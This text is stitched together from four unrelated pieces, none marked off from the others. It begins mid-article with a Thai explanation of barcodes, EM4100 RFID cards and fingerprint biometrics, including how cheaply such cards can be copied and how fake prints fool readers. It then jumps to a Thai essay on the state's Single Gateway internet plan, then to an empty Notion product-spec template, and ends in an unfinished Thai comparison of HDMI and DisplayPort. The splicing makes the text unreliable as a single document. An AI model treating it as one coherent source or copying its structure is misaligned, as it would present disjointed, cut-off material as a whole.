ก็จะได้บาร์โค้ดออกมา แนวคิดของบาร์โค้ดยังถูกพัฒนาออกไปอีกมาก ในช่วงหลังมีการพัฒนาออกมาเป็น QR Code ที่รองรับข้อมูลที่ซับซ้อนกว่า สามารถใส่ตัวอักษรทุกตัวในมาตรฐาน Unicode ลงไปได้ ที่ผ่านมามีการเสนอมาตรฐานใหม่ๆ ขึ้นมาแทน QR Code แต่ก็ยังไม่ได้รับความนิยมนัก โดยเฉพาะมาตรฐาน QR Code นั้นเป็นมาตรฐานเปิดที่ใช้งานได้ฟรี ### RFID: มองไม่เห็น อ่านไม่ออก แต่รู้ว่าใช่ กระบวนการอ่านบาร์โค้ดมีข้อดีอย่างมากคือใช้การพิมพ์ธรรมดาๆ แต่สามารถทำให้คอมพิวเตอร์อ่านข้อมูลได้อย่างแม่นยำ อย่างไรก็ตาม การพิมพ์ไม่ได้เหมาะกับคอมพิวเตอร์ไปทุกกรณี ข้อจำกัดที่สำคัญของบาร์โค้ด คือ เครื่องอ่านและตัวบาร์โค้ดจะต้องจ่อตรงกันพอดี ไม่สามารถมีอะไรกั้นกลางได้ หลายครั้งมุมของเครื่องอ่านต้องพอดีกับมุมของตัวบาร์โค้ด ข้อจำกัดบาร์โค้ดที่ต้องมองเห็นทำให้บาร์โค้ดต้องอยู่ภายนอก เช่นข้างกล่องบรรจุภัณฑ์ทั้งหลายทำให้มีปัญหา เช่น บาร์โค้ดเปื้อนจนอ่านไม่ได้ ถูกขนย้ายจนยับและอ่านไม่ได้ในที่สุด หรือบางครั้งหากต้องการกำหนดหมายเลขประจำตัวกับสิ่งมีชีวิต เช่น สัตว์ในฟาร์ม การวางบาร์โค้ดโดยต้องระวังความเสียหายกลายเป็นเรื่องทำได้ยาก ทำให้มีการเสนอใช้งาน RFID (Radio Frequency Identification) แม้เครื่องอ่าน RFID จะดูเหมือนใช้เทคโนโลยีขั้นสูงจนกระทั่งต้องใช้เครื่องอ่านเฉพาะที่หาไม่ได้ทั่วไป แต่ในความเป็นจริงแล้ว RFID ก็เหมือนเทคโนโลยีระบุตัวคนอื่นๆ ที่สร้างขึ้นมาเพื่อให้คอมพิวเตอร์สามารถระบุตัวตนได้อย่างแม่นยำ โดยไม่มีกระบวนการยืนยันว่าหมายเลขหรือข้อความที่ใช้ระบุตัวตนนั้นมีการปลอมแปลงมาหรือไม่แต่อย่างใด เทคโนโลยี RFID มีมาตรฐานจำนวนมาก และทำงานหลากหลายกันไป ในบทความนี้จะยกตัวอย่างมาตรฐาน RFID เพียงตัวเดียวคือ EM4100 ที่พัฒนาขึ้นโดยบริษัท EM Microelectronic และได้รับการยอมรับเข้าเป็นมาตรฐาน ISO 11784 ภายหลัง บัตร EM4100 พบได้ตามบัตรเข้าออกลานจอดรถ บัตรเข้าออกอาคาร และบัตรพนักงานโดยทั่วไป โดยบัตร EM4100 มีหลักการคือการที่เครื่องอ่านส่งคลื่นความถี่ 125khz ออกมาตลอดเวลา เมื่อบัตรเข้ามาในระยะเครื่องอ่าน ตัวบัตรจะดึงพลังงานจากคลื่นวิทยุที่เครื่องอ่านปล่อยออกมา เมื่อชาร์จจนพอแล้ว บัตรจะเริ่มทำงานโดยการ "ดึง" พลังงานที่ปล่อยออกมาจากเครื่องอ่านเป็นห้วงๆ เครื่องอ่านมีวงจรตรวจสอบได้ว่ามีการดึงพลังงานคลื่นวิทยุที่ปล่อยออกไปหรือไม่ หากมีการดึงพลังงานออกไปเป็นรูปแบบการเข้ารหัสแบบ Manchester ก็จะถอดรหัสออกมาเป็นตัวเลขประจำตัวบัตรได้ ทุกวันนี้บัตร EM4100 มีการใช้งานแพร่หลาย บัตรใบหนึ่งหากซื้อยกล็อตมีราคาเพียง 7-10 บาทเท่านัั้น (บัตรใบเดียวกับที่เวลาทำหายแล้วโดนปรับกันเป็นร้อยนั่นล่ะครับ) เครื่องทำสำเนามีราคาเพียงหลักร้อยบาท และหลักการทำงานของมันก็ง่ายพอที่จะใช้เพียง[ชิป AVR Tiny เพียงตัวเดียวคู่กับขดลวดเหนี่ยวนำเพียงชุดเดียวเพื่อจำลองหมายเลขบัตรใดๆ ก็ได้ที่เราต้องการ](http://scanlime.org/2008/09/using-an-avr-as-an-rfid-tag/) ทุกวันนี้บัตร EM4100 เริ่มถูกใช้งานเพื่อการยืนยันตัวตน (authentication) มากขึ้นเรื่อยๆ แม้ตัวบัตรจะไม่สามารถปลอมแปลงได้ง่ายเหมือนกับบาร์โค้ดหรือ QR Code ก็ตามที แต่ส่วนมากก็ไม่มีกระบวนการป้องการทำสำเนาใดๆ เช่นเดียวกับเทคโนโลยีการระบุตัวตนอื่นๆและหากมีความรู้เพียงพอก็สามารถปลอมแปลงบัตรเหล่านี้ได้ด้วยอุปกรณ์ราคาถูก ### Biometric กระบวนระบุตัวตนที่มีการพูดถึงกันมากในช่วงสิบปีที่ผ่านมา คือ การระบุตัวตนด้วยคุณลักษณะทางชีวภาพ ลักษณะที่เราเกิดมาพร้อมกับมัน คนเราเองมีการพูดถึงกระบวนการระบุตัวตนด้วยกระบวนการต่างๆ กระบวนการที่คนเราใช้จำคนอื่นๆ ในรูปแบบที่ง่ายที่สุด คือ การจดจำใบหน้า เราเรียนรู้ที่จะจดจำใบหน้า รูปร่าง และเสียง ของกันและกันมาตั้งแต่เราเป็นทารก และเมื่อเราโตขึ้นเราก็สามารถจดจำคุณสมบัติเหล่านี้ของคนรอบข้างได้สบายๆ แต่ในความเป็นจริงการจดจำคนจากลักษณะประจำตัวบุคลลนั้นไม่ใช่เรื่องที่สมบูรณ์นัก คนเราเองสามารถทักคนผิด คนหน้าคล้าย ฝาแฝด ฯลฯ ได้ตลอดเวลา คอมพิวเตอร์ที่ยังไม่สามารถเลียนแบบความซับซ้อนของสมองคนเราได้อย่างสมบูรณ์กลับเจอปัญหามากกว่ามนุษย์มาก คอมพิวเตอร์จะจำคนได้ยากทันทีที่มีประเด็นมุมกล้องที่เปลี่ยนไป, สัดส่วนรูปร่างของคนอาจจะเปลี่ยนไปตามเวลา, การแต่งกาย แว่นตา ทรงผม ก็อาจจะทำให้คอมพิวเตอร์ระบุตัวตนผิดได้โดยง่าย กระบวนการทำให้คอมพิวเตอร์สามารถจดจำคุณสมบัติของบุคคลได้เหมือนมนุษย์หรือดีกว่าเป็นความท้าทายในวงการวิจัยมาเป็นเวลานาน ที่เราพบเห็นได้คือการใช้ลายนิ้วมือเพื่อจดจำ ลายนิ้วมือนั้นสร้างรูปร่างและลายของมันขึ้นมาระหว่างที่เราเติบโตขึ้นมากระบวนการนี้ทำให้มนุษย์ทุกคนมีลายนิ้วมือที่ต่างกันไป เซ็นเซอร์ลายนิ้วมือในเครื่องอ่านทั้งหลายนั้น มักมีรูปแบบการทำงานคล้ายกัน คือเป็นเซ็นเซอร์ภาพความกว้างมากกว่าร้อยพิกเซลขึ้นไปแล้วแต่รุ่น เช่น เซ็นเซอร์ลายนิ้วมือแบบรูดที่เราเห็นในโน้ตบุ๊กหลายรุ่น มักให้ภาพความกว้าง 192 พิกเซล ตัวเซ็นเซอร์ที่แท้จริงเป็นเซ็นเซอร์ 192x16 ตารางพิกเซล แต่ตัวเซ็นเซอร์มีหน่วยประมวลผลทำให้สามารถประกอบภาพขณะที่เรารูดนิ้วเข้าเป็นภาพเดียวพร้อมกับปรับระดับความสว่างให้เป็นภาพขาวดำอย่างชัดเจน อย่างไรก็ดี การได้ภาพขาว-ดำ ออกมาไม่ได้ทำให้การเปรียบเทียบและการค้นหาลายนิ้วมือทำได้ง่ายขึ้นนัก ความผิดพลาดเล็กๆ น้อยๆ ความแตกต่างระหว่างการเก็บภาพแต่ละครั้งยังเกิดขึ้นได้เสมอ กระบวนการเปรียบเทียบภาพนั้นต้องเป็นกระบวนการที่ยอมรับความแตกต่างกันได้ กระบวนการเปรียบเทียบเช่นนี้กินพลังประมวลผลสูงและทำงานได้ช้า เพื่อลดข้อมูลที่ต้องเปรียบเทียบลงแทนที่การเปรียบเทียบภาพต่อภาพ จะต้องทำการสกัดคุณสมบัติของลายนิ้วมือ (feature extraction) เพื่อลดรูปแทนที่จะมองภาพเป็นพิกเซลตามปกติ กระบวนการนี้จะมองลายนิ้วมือให้เหลือเพียงคุณสมบัติบางส่วน เช่น แนวการวนของลายนิ้วมือ ลายที่เป็นทางแยกต่างๆ เมื่อเราสามารถแยกองค์ประกอบเหล่านี้ออกมาได้แล้ว เราจะสามารถเปรียบเทียบลายนิ้วมือในฐานข้อมูลได้โดยง่าย กระบวนการเปรียบเทียบข้อมูลทางชีวภาพอื่นๆ มักใช้พื้นฐานเดียวกัน กระบวนการมักเป็นการสกัดคุณสมบัติ เช่น ระยะห่างระหว่างดวงตา, รูปหน้า, สีนัยน์ตา ฯลฯ คอมพิวเตอร์เก็บข้อมูลเหล่านี้เอาไว้แล้วพยายามเปรียบเทียบจากข้อมูลที่สกัดออกมาแล้วเพื่อความง่าย เช่นเดียวกับ RFID กระบวนการตรวจสอบด้วยคุณสมบัติทางชีวภาพถูกใช้ในกระบวนการยืนยันตัวตนอย่างกว้างขวาง เพราะความสะดวกสำหรับผู้ใช้ที่ไม่ต้องจดจำรหัสผ่านที่ซับซ้อน แต่ข้อเสียสำคัญของการใช้แนวทางนี้คือข้อมูลที่ใช้ยืนยันนั้นไม่สามารถเปลี่ยนแปลงได้เลยตลอดชีวิต ลายนิ้วมือของเราอาจจะหลุดไปจากการให้ข้อมูลอย่างไม่ระมัดระวังเมื่อไรก็ได้ ระบบตรวจสอบลายนิ้วมือนั้นมีรายงานหลายครั้งว่าไม่สามารถแยกแยะระหว่างนิ้วมือจริงกับลายยางที่ทำปลอมขึ้นมาแม้จะมีการพัฒนาเทคโนโลยีอย่างต่อเนื่อง เครื่องอ่านลายนิ้วมือบางรุ่นสามารถวัดอุณหภูมิของนิ้วมือที่มาแตะเครื่องเพื่อยืนยันว่าเป็นนิ้วจริง ขณะที่ผู้ปลอมแปลงก็ต่อสู้ด้วยการใช้ลายนิ้วมือปลอมที่บางมากๆ เพื่อแปะเข้ากับนิ้วจริงทำให้หลอกเครื่องได้สำเร็จ แม้จะมีความเสี่ยงในการใช้คุณสมบัติทางชีวภาพเหล่านี้ยืนยันตัวตน ระบบคอมพิวเตอร์จำนวนมากก็ยังรักษาความปลอดภัยด้วยข้อมูลชีวภาพเหล่านี้ แต่นักพัฒนาจำนวนหนึ่งก็ไม่ยอมรับกระบวนการนี้ เช่น [ผู้พัฒนา eCryptfs ระบุว่าการเรียกร้องฟีเจอร์รองรับเครื่องอ่านลายนิ้วมือเพื่อปลดรหัสจะไม่ได้รับการซัพพอร์ต](http://blog.dustinkirkland.com/2013/10/fingerprints-are-user-names-not.html) เพราะการยอมรับลายนิ้วมือเป็นรหัสผ่านการเข้ารหัสเท่ากับว่ายอมรับให้หน่วยงานต่างๆ ที่อาจจะเป็นหน่วยงานรัฐ หรือหน่วยงานเอกชนในประเทศที่ไม่มีการปกป้องข้อมูลชีวภาพส่วนบุคคลสามารถเก็บรหัสการเข้ารหัสไว้ได้ตลอดเวลา อย่างไรก็ดี ความปลอดภัยในการยืนยันตัวตนด้วยคุณสมบัติชีวภาพเช่นนี้สามารถทำได้ในบางกรณีที่มีการตรวจสอบอย่างถี่ถ้วน อาคารรัฐบาลอาจจะใช้หน่วยรักษาความปลอดภัยตรวจสอบผู้เข้าออกอาคารร่วมกับการใช้ข้อมูลชีวภาพเหล่านี้เพื่อตรวจสอบว่าไม่มีการปลอมแปลงใบหน้า, ลายนิ้วมือ, หรือลายม่านตา ก่อนที่จะให้คอมพิวเตอร์ตรวจสอบบุคคลอีกครั้ง ความปลอดภัยโดยรวมของระบบก็จะเท่ากับความปลอดภัยในการตรวจสอบว่ามีการตรวจสอบที่ดีเพียงใด ### ส่งท้าย กระบวนการระบุตัวตนเป็นกระบวนการสำคัญในกระบวนการรักษาความปลอดภัยคอมพิวเตอร์ เทคโนโลยีการระบุตัวตนออกแบบและพัฒนาอย่างต่อเนื่อง เพื่อให้การระบุตัวตนสามารถทำได้รวดเร็ว แม่นยำ สามารถระบุตัวตนได้ไม่ซ้ำซ้อน แต่ความสะดวกในการใช้งานทำให้ทำให้ระบบรักษาความปลอดภัยจำนวนมากเลือกที่จะใช้เทคโนโลยีการระบุตัวตนมาเพื่อยืนยันตัวตน การใช้งานเช่นนี้อาจจะใช้งานได้ในกรณีที่ระบบไม่ต้องการความปลอดภัยมากนัก หรือมีการตรวจสอบอย่างอื่นร่วมด้วยอย่างแม่นยำ
# ทำไมรัฐไทยถึงต้องทำ Single Gateway: มุมมองจากรัฐศาสตร์ ประเด็นในช่วง 1-2 วันที่ผ่านมาบนโลกอินเทอร์เน็ตของไทยที่กล่าวถึงกันมาก คือเรื่องของมติคณะรัฐมนตรีที่ให้กระทรวงเทคโนโลยีสารสนเทศและ[หน่วยงานที่เกี่ยวข้อง](https://www.blognone.com/node/72855) [จัดทำระบบ Single Gateway](https://www.blognone.com/node/72775) หรือกล่าวอย่างง่ายคือ รวม Gateway ของประเทศที่ออกไปต่างประเทศมาอยู่จุดเดียว เหตุผลหลักคือเรื่องของความมั่นคงเป็นหลัก และหลายภาคส่วนเริ่มต้นกล่าวถึงประเด็นเหล่านี้บ้างแล้ว บทความขนาดสั้นชิ้นนี้จะให้มุมมองอีกด้านหนึ่งที่มาจากรัฐศาสตร์ แม้จะไม่นำเสนอว่าควรจะทำอย่างไร แต่จะเป็นฐานของความเข้าใจว่าเรากำลังเจออะไรอยู่ครับ **ทำไมรัฐถึงต้องการควบคุมอินเทอร์เน็ต?** เหตุผลประการสำคัญที่สุดคือเรื่องของ “ความไม่แน่นอน” เป็นหลัก ไม่ใช่รัฐไทยเท่านั้นที่เจอสถานการณ์เช่นนี้ แต่เป็นรัฐทั่วโลกที่ต้องเจอปัญหาเหล่านี้ สำหรับภาครัฐ อินเทอร์เน็ตถือเป็นพรมแดนที่ไม่สามารถเข้าไปจัดการได้ กล่าวในภาษาทางวิชาการคือเป็นพื้นที่ซึ่งรัฐเข้าไปวางหลักการและกำหนดกติกาของสังคมแบบพื้นที่อื่นๆ ไม่ได้ ในกรณีของสหรัฐอเมริกา ปัญหาเหล่านี้เกิดขึ้นในการถกเถียงในสภาคองเกรสอยู่เสมอ ตัวอย่างเช่นการออกกฎหมายว่าด้วยเรื่องการควบคุมสื่อลามกอนาจารในเด็ก มีการถกเถียงกันว่า จะบังคับใช้กฎหมายอย่างไร แนวทางในการดำเนินการเป็นอย่างไร และขอบเขตอยู่ตรงไหน เพราะอินเทอร์เน็ตไม่มีขอบเขตและพรมแดนที่เราเห็นได้แน่นอน กล่าวอีกอย่างคือ ผู้ใช้งานสามารถกระโดดข้ามพรมแดนระหว่างรัฐไปมาได้อย่างสะดวกนั่นเอง นอกจากนั้นแล้ว ความไม่แน่นอนในพื้นที่ของอินเทอร์เน็ต เป็นช่องทางให้มีการไหลของข้อมูลต่างๆ ซึ่งภาครัฐมองว่านี่เป็นเรื่องไม่พึงประสงค์ ตลอดจนถึงเป็นการท้าทายตัวโครงสร้างของรัฐ ซึ่งระบบของข้อมูลภาครัฐใช้แนวทางแบบ broadcast หรือการกระจายข้อมูลจากจุดหนึ่ง ผิดกับแนวทางอินเทอร์เน็ต ที่เป็นการกระจายข้อมูลระหว่างผู้ใช้งาน (self-communications) ระหว่างกัน การควบคุมแนวทางของข้อมูลจึงเป็นไปได้ยากกว่ากันมาก ด้วยเหตุผลโดยคร่าวสองส่วนข้างต้น รัฐจึงอาศัยสิ่งที่เรียกว่า *Raison d’Etat* หรือ Reason of the State ที่แปลว่าเหตุผลของรัฐเข้ามาจัดการ Raison d’Etat มีความหมายว่า “**เหตุผลทางการเมืองสำหรับการกระทำหรือตัดสินใจอย่างใดอย่างหนึ่งของรัฐบาล โดยเฉพาะอย่างยิ่งเมื่อความยุติธรรม ความเปิดเผย (openness) หรือความตรงไปตรงมานั้น *ไม่มีส่วนเกี่ยวข้อง***” สำหรับนักวิชาการอย่าง Michel Foucault สิ่งที่รัฐตัดสินใจทำอิงอยู่บนหลัก “ความจำเป็น” ในการ “รักษาตัวรัฐให้อยู่รอด” มากกว่าสิ่งอื่นใด ความหวาดกลัวของรัฐในข้อนี้ เมื่อมาปรับใช้กับแนวทางแบบ Single Gateway แล้ว ก็ย่อมทำให้รัฐรู้สึกได้ว่ามีความมั่นคง เพราะตัวเองใช้กลไกในการควบคุมการสื่อสารข้อมูล และสร้างความมั่นใจว่าข้อมูลที่อยู่ภายใต้การตรวจสอบจากรัฐนั้น จะทำให้รัฐไม่ถูกท้าทาย ในเวลาเดียวกัน เมื่อถึงยามจำเป็น รัฐก็สามารถ “ตัดขาด” การเชื่อมต่อภายนอกได้ด้วยความรวดเร็ว **ทำไมรัฐไทยต้องสร้าง single gateway?** คำตอบที่ได้มีอยู่สองมิติ มิติแรกคือเรื่องของการสถาปนาอำนาจที่ต่อเนื่องมาจากแนวทางหลังรัฐประหารปี 2549 กับแบบที่สองคือเรื่องของฐานคิดแบบอำนาจนิยม มิติแรกคือเรื่องของการสถาปนาอำนาจอย่างต่อเนื่อง ในบทความที่มีชื่อว่า “State Repression in Cyberspace: The Case of Thailand” ของ เอม สินเพ็ง อาจารย์ประจำภาควิชาการเมืองการปกครอง มหาวิทยาลัยซิดนีย์ ระบุอย่างชัดเจนว่า รัฐไทยมีความพยายามในการสถาปนาอำนาจบนพื้นที่ของอินเทอร์เน็ต นับตั้งแต่การรัฐประหาร 2549 เป็นต้นมา ความพยายามนี้ไม่ใช่แค่การปิดกั้นหรือเข้าถึงเว็บไซต์ที่มีเนื้อหาหมิ่นเหม่ต่อความมั่นคง หรือหมิ่นพระบรมเดชานุภาพเท่านั้น แต่ยังรวมไปถึงการสร้างองค์กร หน่วยงานสนับสนุน และโครงสร้าง อย่างเช่น การออกพระราชบัญญัติว่าด้วยการกระทำผิดทางคอมพิวเตอร์ ซึ่งทำมาอย่างต่อเนื่อง แม้ในสมัยรัฐบาลที่มาจากการเลือกตั้งทุกรัฐบาลก็ตาม แนวทางการสร้าง single gateway จึงเป็นเสมือนพัฒนาการของการทำระบบควบคุมหรือสั่งการ ซึ่งต่อเนื่องมาจากแนวทางสมัยรัฐประหารเมื่อปี 2549 ซึ่งวางรากฐานไว้อยู่แล้ว มิติที่สองเป็นเรื่องของฐานคิดแบบอำนาจนิยม ดังจะเห็นได้จากในส่วนกรอบคำอธิบายเรื่อง “เหตุผลของรัฐ” สิ่งที่เกิดขึ้นภายใต้สภาวะปัจจุบันที่อำนาจทั้งหมด ถูกรวบขึ้นไปที่ คสช. ย่อมทำให้การตัดสินใจสร้าง single gateway เป็นเรื่องที่มีความชอบธรรม เพื่อรักษาฐานอำนาจของรัฐ ซึ่งสอดคล้องแนวปฏิบัติหรือกรอบกฎหมายอย่างมาตรา 44 ตามรัฐธรรมนูญแห่งราชอาณาจักรไทย ฉบับชั่วคราวในปัจจุบัน นอกจากนั้นยังสะท้อนแนวคิดของกองทัพที่ดูแลเรื่องของความมั่นคง มิตินี้จึงมองได้ว่า การเกิดขึ้นของ single gateway จึงเป็นการแสดงตัวตนและสะท้อนแนวคิดของกองทัพบก ในฐานะผู้ใช้อำนาจ ณ ปัจจุบัน ทั้งสองมิตินี้แม้อาจจะสะท้อนความจำเป็นในการสร้าง single gateway ได้ไม่หมด แต่น่าจะถือเป็นสองปัจจัยหลักในการที่ผลักดันภาครัฐให้ตัดสินใจเช่นนี้ **ใช้งานได้จริง?** ปัญหาที่รัฐไทยต้องเผชิญอย่างหนึ่งนั่นก็คือ โครงสร้างของโลกอินเทอร์เน็ตหรือ Cyberspace นั้นมีโครงสร้างที่ยืดหยุ่นและไม่แน่นอนสูงมาก ในปัจจุบัน ไทยมี Gateway อินเทอร์เน็ตรวมแล้วเกินกว่า 10 ที่ ([จากข้อมูลของ NECTEC](http://internet.nectec.or.th/webstats/show_page.php?py0HA8wH8+a7AIaRsDo/prnHnBJzfoE5torm+SGClYjtQEWhkYA5iTdIGNGTyx5G1qOOi4PLmhJ6xgTFwiOMpA==)) และโครงสร้างเหล่านี้จะ “ขยาย” หรือ “หดตัว” ก็ได้ตามแต่ที่จะต้องการ คำถามคือ มีหลักประกันอะไรหรือไม่ที่ภาครัฐจะมั่นใจได้อย่างไรว่า โครงสร้างอินเทอร์เน็ตจะไม่เปลี่ยนแปลง หากเกิดสมมติว่ามีภาคเอกชนต้องการแอบตั้ง gateway ตัวเองอย่างลับๆ และพร้อมที่จะ “สลับ” ระบบไปมา เพื่อหลบหลีกภาครัฐ นอกจากนั้นแล้ว ภาครัฐเองยังต้องเผชิญหน้ากับกระบวนการเข้ารหัส ตลอดจนถึงการปลอมตัวตน (anonymity) เพื่อรับส่งข้อมูลต่างๆ อีกมาก ทั้งหมดนี้แม้เป็นเรื่องทางเทคนิค แต่ส่งผลต่อการดำเนินนโยบายว่าจะสามารถ “ใช้ได้ผลจริง” หรือไม่ (policy execution and action) ในระดับปฏิบัติ นี่ยังไม่รวมถึงปริมาณข้อมูลมหาศาลที่จะต้องสร้างและทุ่มการลงทุนเพื่อทำให้เกตเวย์แห่งชาติเป็นจริงนั้น ต้องใช้เม็ดเงินจำนวนมหาศาลและกำลังคนที่เยอะตามไปด้วย ที่หนักที่สุดคือเรื่องของความมั่นคงของอินเทอร์เน็ตโดยรวม ทุกวันนี้ภาคเอกชนโดยเฉพาะธนาคารของไทย ล้วนแล้วแต่ใช้ระบบอิเล็กทรอนิกส์ของอินเทอร์เน็ตในการติดต่อสื่อสารแทบทั้งสิ้น การแขวนชะตากรรมของบริษัทหรือการดำเนินธุรกรรมไว้เพียงจุดเดียว หากเกิดเหตุการณ์ล่มไป สิ่งที่เกิดขึ้นคือความเสียหายทางธุรกิจนับร้อยล้านบาททั้งสิ้น นโยบายนี้จึงเต็มไปด้วยปัญหา แม้ว่าการตัดสินใจจะวางรากฐานอยู่บนหลักความมั่นคงและเหตุผลของรัฐก็ตาม ทั้งหมดนี้จะนำไปสู่ วิกฤตการณ์ความเชื่อมั่นและปัญหาทางการเมืองในระยะยาว เพราะเศรษฐกิจและการเมืองนั้น เชื่อมโยงกันอย่างชัดเจนและหลีกเลี่ยงไม่ได้ กล่าวอย่างง่ายที่สุด การสร้างความมั่นคงให้กับรัฐด้วยการสร้าง single gateway หาใช่การสร้างความมั่นคงและมั่นใจในระบบอินเทอร์เน็ตโดยรวมของประเทศไม่ **ประชาชนอย่างเราต้องทำอย่างไร?** หากเงื่อนไขของประเทศเป็นประชาธิปไตย ภาคประชาชนจะต้องเข้าไปมีเสียงและมีส่วนร่วมในการตัดสินใจครั้งสำคัญในครั้งนี้อย่างแน่นอน และเป็นสิ่งที่สมควรจะทำอย่างยิ่ง อย่างไรก็ตาม ภายใต้เงื่อนไขและสภาวะปัจจุบัน โดยเฉพาะอย่างยิ่งการพยายามผลักดันของหน่วยงานภาครัฐและองค์กรหลายฝ่ายที่อยู่กับภาครัฐ จะเห็นได้ว่า ความพยายามคัดค้านของภาคประชาชนแทบจะไร้ผล อีกทั้งยังสุ่มเสี่ยงต่อการที่จะถูกดำเนินคดีตามมาอย่างไม่จำเป็น หนทางเดียวที่อาจจะพอทำได้ คือการภาวนาอย่างลึกๆ ว่าในที่สุดแล้วความเห็นนี้จะประสบปัญหาจนยากที่จะดำเนินการในความเป็นจริงดังที่ได้ชี้ให้เห็นแล้วในส่วนที่สาม ซึ่งทั้งหมดนี้ก็แล้วแต่ว่าท่านผู้อ่านจะมองเห็นประเด็นนี้อย่างไร **อ้างอิง** Castells, M. (2007). Communication, Power and Counter-power in the Network Society. International Journal of Communication(1). Foucault, M., & Davidson, A. I. (2009). Security, Territory, Population (G. Burchell, Trans. M. Senellart, F. Ewald, & A. Fontana Eds. Paperback ed.). Basingstoke: Palgrave Macmillan. Hobson, A. (2004). The Oxford Dictionary of Difficult Words: Oxford University Press. Johnson, D. R., & Post, D. (1996). Law and borders: The rise of law in cyberspace. Stanford Law Review, 1367-1402. Limudomporn, P. (2015). Why the Thai government hates online social networks: a theoretical approach examination. Paper presented at the The Sixth Annual Debating Internet Communities and Social Networks Conference, Online. [http://networkconference.netstudies.org/2015Bentley/thailand-online-social-networks/](http://networkconference.netstudies.org/2015Bentley/thailand-online-social-networks/) Sinpeng, A. (2013). State Repression in Cyberspace: The Case of Thailand. Asian Politics & Policy, 5(3), 421-440. Sinpeng, A. (2014). The Cyber Coup. Fieldsights - Hot Spots, Cultural Anthropology Online. Retrieved April 2, 2015, from [http://www.culanth.org/fieldsights/568-the-cyber-coup](http://www.culanth.org/fieldsights/568-the-cyber-coup) Skinner, Q. (2010). The sovereign state: a genealogy. In H. Kalmo & Q. Skinner (Eds.), Sovereignty in Fragments. Cambridge: Cambridge University Press. Villeneuve, N. (2006). The filtering matrix: Integrated mechanisms of information control and the demarcation of borders in cyberspace. First Monday, 11(1).
# New Product Spec (PRD) Tags: Product <aside> 💡 **Notion Tip:** Here at Notion we use this template to help teams plan, design and develop products with the greatest chance for success. It helps teams think through their work more deeply, improves asynchronous communication with other teams, and creates space for collaboration. </aside> # 👀 Problem > **Example questions to answer:** What problem are we solving? For whom? When do they experience this issue? What data, research and feedback do we have that explains this problem? Which customers are we working with, or hearing from, to better understand this problem? Why is solving this problem urgent? Why is it important? > --- # 💭 Proposal > **Example questions to answer:** How are we solving this issue? What alternatives did we consider? Why did we land with this? What is the general shape of this solution? Do you have any mocks, prototypes, relevant comparisons in the market? How will we know that we’ve solved this issue? What will we measure? Have we considered how we’re building this to be fast, performant, scalable and/or relatively low-cost on our services? > --- # 🛫 Plan > **Example questions to answer:** What are we building? How does it work? How do we know that it works? What are we measuring? When will it be ready? **Then, answer these questions:** > > - Question 1: Does everyone know what are we launching? > - [ ] **Internal alignment** > - [ ] Can we explain what this change is? > - [ ] Have you shared details of this change with other functions? > - [ ] **External messaging** > - [ ] How are we going to communicate our launch to customers? > - [ ] How will customers understand changes due to this launch? > - Question 2: Are we sure this is going to work? > - [ ] **Quality** > - [ ] Has this product been tested appropriately? > - [ ] Have we checked for effects on other products? > - [ ] Have we done capacity planning? > - [ ] Do we have a contingency plan if the launch doesn’t go well? > - [ ] **Measurement** > - [ ] Do we know how to tell if this launch is a success or not? > - [ ] Can others see how this launch is going? > - Question 3: What are our launch steps? > - [ ] **Plan** > - [ ] Have you agreed on launch audiences with PMM? > - [ ] Did we agree on launch steps with PMM? > > *🚀 It’s go time!* > *... and feel free to link to other more detailed documents* ****
# เทียบมวย HDMI vs. DisplayPort จากที่ผมลงข่าวเรื่อง VESA ประกาศใช้มาตรฐาน Mini DisplayPort (ดูข่าวเก่า) และคุณ lew ก็ได้คอมเมนท์ถามถึงว่าตกลง HDMI มันต่างกับ DisplayPort ยังไงบ้าง ซึ่งผมเองก็สงสัยเหมือนกัน ในวันนี้ผมเลยลองรื้อๆ ข้อมูลดู และพบประเด็นที่น่าสนใจหลายๆ อย่างเหมือนกัน ผมได้พยายามสรุปเป็นข้อๆ จะได้เข้าใจง่ายๆ นะครับ แต่คิดว่าถ้าใครอยากรู้ละเอียด อ่านใน Wikipedia ก็มีเยอะครับ (HDMI, DisplayPort) - รูปลักษณ์ของพอร์ทมีรูปแบบและขนาดที่ใกล้เคียงกันมาก แต่ DisplayPort จะมีหัวล็อก เวลาจะดึงจะต้องกดด้านบนของหัวต่อก่อนถึงจะดึงออก ในขณะที่ HDMI ดึงได้เลย - HDMI มี 19 พิน ในขณะที่ DisplayPort มี 20 พิน - การส่งข้อมูล HDMI ส่งข้อมูล 3 ช่องทาง แบ่งเป็นสีแดง เขียว น้ำเงิน โดยมีอีกหนึ่งช่องสัญญาณเป็นสัญญาณนาฬิกา มีความถี่ 340 MHz ในขณะที่ช่องสัญญาณของ DisplayPort มี 4 ช่องสัญญาณ แต่ข้อมูลทั้งหมดจะถูกส่งเป็น packet ดังนั้นการจะใช้กี่ช่องสัญญาณขึ้นอยู่กับความละเอียดของหน้าจอ หรือข้อมูลอื่นๆ ที่ต้องส่ง โดยแต่ละช่องสัญญาณมีการควบคุมสัญญาณนาฬิกาแยกกันเลย และแล้วแต่ว่าจะใช้ความถี่เท่าไหร่ - แบนด์วิดท์สูงสุดของข้อมูล HDMI อยู่ที่ 10.2 Gbit/s ในขณะที่ DisplayPort มี 8.64 Gbit/s ทั้งนี้ไม่รวมข้อมูลที่ส่งเป็นอนาล็อกผ่านพอร์ท auxiliary ที่ทั้งสองมาตรฐานก็มีทั้งคู่ - ทั้ง HDMI และ DisplayPort สามารถพูดคุยกับอุปกรณ์จอภาพเพื่อหาความละเอียดของจอภาพที่เหมาะสมได้ แต่ใช้โปรโตคอลต่างกัน - พอร์ท auxiliary ของ HDMI เป็นแบบทางเดียว สามารถใช้ส่งข้อมูลอนาล็อกอื่นๆ เช่นลำโพงได้ ในขณะที่ auxiliary ของ DisplayPort เป็นแบบสองทิศทาง สามารถใช้กับอุปกรณ์ที่ส่งข้อมูลกลับอย่างไมโครโฟน หรือเว็บแคมได้ด้วย - ด้วยการที่ auxiliary ของ DisplayPort เป็นสองทิศทาง ทำให้สามารถบรรจุ USB เข้าไปใน DisplayPort ได้ จึงสามารถทำให้จอเป็น USB hub ได้ โดยใช้สาย DisplayPort อันเดียว - DisplayPort สามารถปรับให้ส่งข้อมูลแบบ LVDS ซึ่งเป็นอินเตอร์เฟซที่คอนโทรเลอร์ในจอภาพ (display) ใช้พูดคุยกับตัวจอ (panel) กล่าวคือ DisplayPort สามารถทำให้จอภาพเล็กและถูกลงได้ เพราะไม่ต้องมีวงจรแปลงสัญญาณอีก สามารถควบคุมจอ (panel) ได้โดยตรง - HDMI มีการอิมพลีเมนต์การควบคุมอุปกรณ์ A/V ข้ามกันได้แล้วเรียบร้อย 